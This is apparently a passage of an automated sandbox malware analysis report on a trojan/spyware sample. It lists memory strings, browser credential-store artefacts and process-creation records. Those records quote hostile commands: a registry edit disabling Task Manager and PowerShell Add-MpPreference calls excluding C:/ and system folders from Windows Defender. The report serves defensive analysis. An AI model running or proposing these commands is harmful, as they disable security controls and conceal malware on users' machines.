00000026.00000002.2221324437.0000021500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2351882057.000001E45BA21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000009.00000002.2357627682.000002790E237000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2195750455.000001D526ED6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2325076321.000001A0A0538000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2223222287.0000026A80227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2219002158.000002A100226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2323376954.0000018C922D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2304342959.0000026562D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2327736716.000001A43172F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2306910625.00000231D7A47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2363724550.0000026337B00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2284077439.0000015534C76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2331466618.000001A3E7B77000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2436254861.000002A23FF66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2351859709.00000288C3626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2196163130.000001DA00227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2383859064.000001F5A3F76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2221324437.0000021500227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2351882057.000001E45BC48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: powershell.exe, 00000028.00000002.2351882057.000001E45BC48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: 1JlnlFSxkh.50.dr, yt9V4rph85.50.dr, 9WCwR03Tll.50.dr, s1AjQZ4nTS.50.dr, 4sGN1EsVo7.50.dr, XWsircgMqo.50.dr, p3jqsCAhXN.50.dr, jx3Kwac9ON.50.dr, WRl6Eyb0KX.50.dr, P9tOE8HlLp.50.dr, yXn6SbeOYX.50.dr, klC6K8HF4L.50.dr, Y7Vz7WsRq8.50.dr, W6VvxK2Sua.50.dr, 0YKhB50rIt.50.dr, ZRTuzhPa5g.50.dr, M3mdCaYJjU.50.dr, iCPfZ7GX4L.50.dr, bM63ETQKP4.50.dr, dViI4f8bSP.50.dr, FCLt0tcspk.50.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: powershell.exe, 00000009.00000002.2357627682.000002790E011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2195750455.000001D526CB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2325076321.000001A0A0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2223222287.0000026A80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2219002158.000002A100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2323376954.0000018C920B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2304342959.0000026562B11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2327736716.000001A4314E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2306910625.00000231D7821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2363724550.00000263378B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2284077439.0000015534A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2331466618.000001A3E7951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2436254861.000002A23FD41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2351859709.00000288C3381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2196163130.000001DA00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2383859064.000001F5A3D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2221324437.0000021500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2351882057.000001E45BA21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: 1JlnlFSxkh.50.dr, yt9V4rph85.50.dr, 9WCwR03Tll.50.dr, s1AjQZ4nTS.50.dr, 4sGN1EsVo7.50.dr, XWsircgMqo.50.dr, p3jqsCAhXN.50.dr, jx3Kwac9ON.50.dr, WRl6Eyb0KX.50.dr, P9tOE8HlLp.50.dr, yXn6SbeOYX.50.dr, klC6K8HF4L.50.dr, Y7Vz7WsRq8.50.dr, W6VvxK2Sua.50.dr, 0YKhB50rIt.50.dr, ZRTuzhPa5g.50.dr, M3mdCaYJjU.50.dr, iCPfZ7GX4L.50.dr, bM63ETQKP4.50.dr, dViI4f8bSP.50.dr, FCLt0tcspk.50.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: 1JlnlFSxkh.50.dr, yt9V4rph85.50.dr, 9WCwR03Tll.50.dr, s1AjQZ4nTS.50.dr, 4sGN1EsVo7.50.dr, XWsircgMqo.50.dr, p3jqsCAhXN.50.dr, jx3Kwac9ON.50.dr, WRl6Eyb0KX.50.dr, P9tOE8HlLp.50.dr, yXn6SbeOYX.50.dr, klC6K8HF4L.50.dr, Y7Vz7WsRq8.50.dr, W6VvxK2Sua.50.dr, 0YKhB50rIt.50.dr, ZRTuzhPa5g.50.dr, M3mdCaYJjU.50.dr, iCPfZ7GX4L.50.dr, bM63ETQKP4.50.dr, dViI4f8bSP.50.dr, FCLt0tcspk.50.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: 1JlnlFSxkh.50.dr, yt9V4rph85.50.dr, 9WCwR03Tll.50.dr, s1AjQZ4nTS.50.dr, 4sGN1EsVo7.50.dr, XWsircgMqo.50.dr, p3jqsCAhXN.50.dr, jx3Kwac9ON.50.dr, WRl6Eyb0KX.50.dr, P9tOE8HlLp.50.dr, yXn6SbeOYX.50.dr, klC6K8HF4L.50.dr, Y7Vz7WsRq8.50.dr, W6VvxK2Sua.50.dr, 0YKhB50rIt.50.dr, ZRTuzhPa5g.50.dr, M3mdCaYJjU.50.dr, iCPfZ7GX4L.50.dr, bM63ETQKP4.50.dr, dViI4f8bSP.50.dr, FCLt0tcspk.50.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: 1JlnlFSxkh.50.dr, yt9V4rph85.50.dr, 9WCwR03Tll.50.dr, s1AjQZ4nTS.50.dr, 4sGN1EsVo7.50.dr, XWsircgMqo.50.dr, p3jqsCAhXN.50.dr, jx3Kwac9ON.50.dr, WRl6Eyb0KX.50.dr, P9tOE8HlLp.50.dr, yXn6SbeOYX.50.dr, klC6K8HF4L.50.dr, Y7Vz7WsRq8.50.dr, W6VvxK2Sua.50.dr, 0YKhB50rIt.50.dr, ZRTuzhPa5g.50.dr, M3mdCaYJjU.50.dr, iCPfZ7GX4L.50.dr, bM63ETQKP4.50.dr, dViI4f8bSP.50.dr, FCLt0tcspk.50.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: 1JlnlFSxkh.50.dr, yt9V4rph85.50.dr, 9WCwR03Tll.50.dr, s1AjQZ4nTS.50.dr, 4sGN1EsVo7.50.dr, XWsircgMqo.50.dr, p3jqsCAhXN.50.dr, jx3Kwac9ON.50.dr, WRl6Eyb0KX.50.dr, P9tOE8HlLp.50.dr, yXn6SbeOYX.50.dr, klC6K8HF4L.50.dr, Y7Vz7WsRq8.50.dr, W6VvxK2Sua.50.dr, 0YKhB50rIt.50.dr, ZRTuzhPa5g.50.dr, M3mdCaYJjU.50.dr, iCPfZ7GX4L.50.dr, bM63ETQKP4.50.dr, dViI4f8bSP.50.dr, FCLt0tcspk.50.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: 1JlnlFSxkh.50.dr, yt9V4rph85.50.dr, 9WCwR03Tll.50.dr, s1AjQZ4nTS.50.dr, 4sGN1EsVo7.50.dr, XWsircgMqo.50.dr, p3jqsCAhXN.50.dr, jx3Kwac9ON.50.dr, WRl6Eyb0KX.50.dr, P9tOE8HlLp.50.dr, yXn6SbeOYX.50.dr, klC6K8HF4L.50.dr, Y7Vz7WsRq8.50.dr, W6VvxK2Sua.50.dr, 0YKhB50rIt.50.dr, ZRTuzhPa5g.50.dr, M3mdCaYJjU.50.dr, iCPfZ7GX4L.50.dr, bM63ETQKP4.50.dr, dViI4f8bSP.50.dr, FCLt0tcspk.50.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: svchost.exe, 00000033.00000003.2218945708.000001D075672000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                        Source: powershell.exe, 00000028.00000002.2351882057.000001E45BC48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: svchost.exe, 00000033.00000003.2218945708.000001D075672000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                        Source: 1JlnlFSxkh.50.dr, yt9V4rph85.50.dr, 9WCwR03Tll.50.dr, s1AjQZ4nTS.50.dr, 4sGN1EsVo7.50.dr, XWsircgMqo.50.dr, p3jqsCAhXN.50.dr, jx3Kwac9ON.50.dr, WRl6Eyb0KX.50.dr, P9tOE8HlLp.50.dr, yXn6SbeOYX.50.dr, klC6K8HF4L.50.dr, Y7Vz7WsRq8.50.dr, W6VvxK2Sua.50.dr, 0YKhB50rIt.50.dr, ZRTuzhPa5g.50.dr, M3mdCaYJjU.50.dr, iCPfZ7GX4L.50.dr, bM63ETQKP4.50.dr, dViI4f8bSP.50.dr, FCLt0tcspk.50.drString found in binary or memory: https://www.ecosia.org/newtab/
                        Source: 1JlnlFSxkh.50.dr, yt9V4rph85.50.dr, 9WCwR03Tll.50.dr, s1AjQZ4nTS.50.dr, 4sGN1EsVo7.50.dr, XWsircgMqo.50.dr, p3jqsCAhXN.50.dr, jx3Kwac9ON.50.dr, WRl6Eyb0KX.50.dr, P9tOE8HlLp.50.dr, yXn6SbeOYX.50.dr, klC6K8HF4L.50.dr, Y7Vz7WsRq8.50.dr, W6VvxK2Sua.50.dr, 0YKhB50rIt.50.dr, ZRTuzhPa5g.50.dr, M3mdCaYJjU.50.dr, iCPfZ7GX4L.50.dr, bM63ETQKP4.50.dr, dViI4f8bSP.50.dr, FCLt0tcspk.50.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWindow created: window name: CLIPBRDWNDCLASS

                        System Summary

                        barindex
                        Windows Scripting host queries suspicious COM object (likely to drop second stage)
                        Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_00276FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00276FAA
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Windows\Panther\UnattendGC\TnsvMjfQwJOjpYJzqEDNh.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Windows\Panther\UnattendGC\ba5d7d16636746Jump to behavior
                        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_0027848E0_2_0027848E
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_00286CDC0_2_00286CDC
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_002800B70_2_002800B7
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_002840880_2_00284088
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_002740FE0_2_002740FE
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_002871530_2_00287153
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_002951C90_2_002951C9
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_002732F70_2_002732F7
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_002862CA0_2_002862CA
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_002843BF0_2_002843BF
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_0027C4260_2_0027C426
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_0027F4610_2_0027F461
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_0029D4400_2_0029D440
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_002877EF0_2_002877EF
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_0027286B0_2_0027286B
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_0029D8EE0_2_0029D8EE
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_0027E9B70_2_0027E9B7
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_002A19F40_2_002A19F4
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_00283E0B0_2_00283E0B
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_00294F9A0_2_00294F9A
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_0027EFE20_2_0027EFE2
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeCode function: 8_2_00007FFD9BAA0D4C8_2_00007FFD9BAA0D4C
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeCode function: 8_2_00007FFD9BAA0E438_2_00007FFD9BAA0E43
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeCode function: 8_2_00007FFD9BE891A98_2_00007FFD9BE891A9
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\BkJolhdT.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: String function: 0028EC50 appears 56 times
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: String function: 0028F5F0 appears 31 times
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: String function: 0028EB78 appears 39 times
                        Source: DjKnpLXK.log.8.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: ZDjBezmV.log.8.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: PVPluWhn.log.8.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: xIogbBMY.log.8.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: mUJprpRq.log.8.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: DBQFDgRN.log.8.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: tSxpUEMf.log.8.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: BkJolhdT.log.50.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: amqbDjSR.log.50.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: REWLTGNk.log.50.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: pIbqPImn.log.50.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: YBKLwVHY.log.50.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: FpiFczmJ.log.50.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: vBEPsorb.log.50.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: OisrvsB6Ea.exe, 00000000.00000003.1673294084.00000000055AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs OisrvsB6Ea.exe
                        Source: OisrvsB6Ea.exe, 00000000.00000003.1673294084.00000000055AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs OisrvsB6Ea.exe
                        Source: OisrvsB6Ea.exe, 00000000.00000002.1676019140.00000000055AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs OisrvsB6Ea.exe
                        Source: OisrvsB6Ea.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@76/343@1/2
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_00276C74 GetLastError,FormatMessageW,0_2_00276C74
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_0028A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_0028A6C2
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Program Files (x86)\microsoft office\Office16\dasHost.exeJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeFile created: C:\Users\user\AppData\Roaming\ComProviderDriversavescrtJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1712:120:WilError_03
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-IlTr7bwNxEio1IRNv7Cv
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Users\user\AppData\Local\Temp\asMiv0NQX3Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\XyQqwqHSpVeTNnNDm2Xa4eg.bat" "
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCommand line argument: sfxname0_2_0028DF1E
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCommand line argument: sfxstime0_2_0028DF1E
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCommand line argument: STARTDLG0_2_0028DF1E
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCommand line argument: xz,0_2_0028DF1E
                        Source: OisrvsB6Ea.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeFile read: C:\Windows\win.iniJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: iBP5BfRoTv.50.dr, fiQXVoqIRi.50.dr, oKObDLWzeB.50.dr, ld6hTecCzW.50.dr, 96vx87EYSZ.50.dr, h77Uk2epKz.50.dr, SfaCX3UPFW.50.dr, pul8k1pnWC.50.dr, UTUuNLGZIe.50.dr, 0pMkvRpjPR.50.dr, 1pHiMLPEzt.50.dr, GmIRbxFjNC.50.dr, 9QX5SrMSF8.50.dr, zaSSX7RXtx.50.dr, yycG0dLQ73.50.dr, NKMrI06Vrb.50.dr, MSMCtLJRhT.50.dr, VX27bY4CSL.50.dr, uznz9CYzxe.50.dr, CChzuaKY4Y.50.dr, cQH4grE6Ql.50.dr, RVl0ElJFwk.50.dr, ngRqhJWd5l.50.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: OisrvsB6Ea.exeReversingLabs: Detection: 60%
                        Source: OisrvsB6Ea.exeVirustotal: Detection: 50%
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeFile read: C:\Users\user\Desktop\OisrvsB6Ea.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\OisrvsB6Ea.exe "C:\Users\user\Desktop\OisrvsB6Ea.exe"
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\zavVQKy7Y1920izKCt5xjM9GjoXxNpPSllMDj1uh.vbe"
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\XyQqwqHSpVeTNnNDm2Xa4eg.bat" "
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt/ComrefNetsvc.exe"
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
